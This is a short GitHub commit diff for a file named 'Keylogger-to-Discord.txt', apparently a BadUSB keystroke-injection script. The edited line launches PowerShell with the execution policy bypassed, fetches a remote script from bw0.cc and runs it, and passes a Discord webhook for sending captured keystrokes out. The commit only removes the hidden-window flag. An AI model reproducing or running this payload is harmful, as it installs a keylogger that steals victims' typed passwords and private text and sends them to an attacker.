Update Keylogger-to-Discord.txt

This commit is contained in:
egieb
2025-06-20 10:50:56 +00:00
committed by GitHub
parent 8e2c5a8c8b
commit 00dc8c2af7
+1 -1
View File
@@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dckl)
STRING powershell -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dckl)
ENTER